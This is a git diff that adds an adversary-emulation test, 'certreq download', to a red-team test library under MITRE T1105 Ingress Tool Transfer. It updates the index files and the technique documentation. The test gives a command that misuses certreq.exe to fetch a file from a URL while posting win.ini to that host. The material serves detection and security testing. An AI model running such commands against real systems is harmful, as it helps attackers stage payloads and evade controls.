diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f0f95d4e..80047754 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1243,6 +1243,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a60044ab..8290c874 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -902,6 +902,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3e6cf877..98416706 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -2085,6 +2085,7 @@
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
+ - Atomic Test #25: certreq download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 030d9e4b..aa1cd5a0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1514,6 +1514,7 @@
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
+ - Atomic Test #25: certreq download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 08752eaa..cae2ce81 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -91039,6 +91039,24 @@ command-and-control:
'
name: command_prompt
+ - name: certreq download
+ auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
+ description: Use certreq to download a file from the web
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_path:
+ description: Local path to place file
+ type: String
+ default: "%temp%\\Atomic-license.txt"
+ remote_file:
+ description: URL of file to copy
+ type: url
+ default: https://example.com
+ executor:
+ command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
+ cleanup_command: 'del #{local_path} >nul 2>&1'
+ name: command_prompt
T1001.002:
technique:
x_mitre_platforms:
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 3dc9618c..ffac8680 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -56,6 +56,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
- [Atomic Test #24 - Lolbas replace.exe use to copy UNC file](#atomic-test-24---lolbas-replaceexe-use-to-copy-unc-file)
+- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)
+
@@ -1092,4 +1094,42 @@ del %TEMP%\redcanary.cab >nul 2>&1
+
+
+
+## Atomic Test #25 - certreq download
+Use certreq to download a file from the web
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6fdaae87-c05b-42f8-842e-991a74e8376b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_path | Local path to place file | String | %temp%\Atomic-license.txt|
+| remote_file | URL of file to copy | url | https://example.com|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{local_path} >nul 2>&1
+```
+
+
+
+
+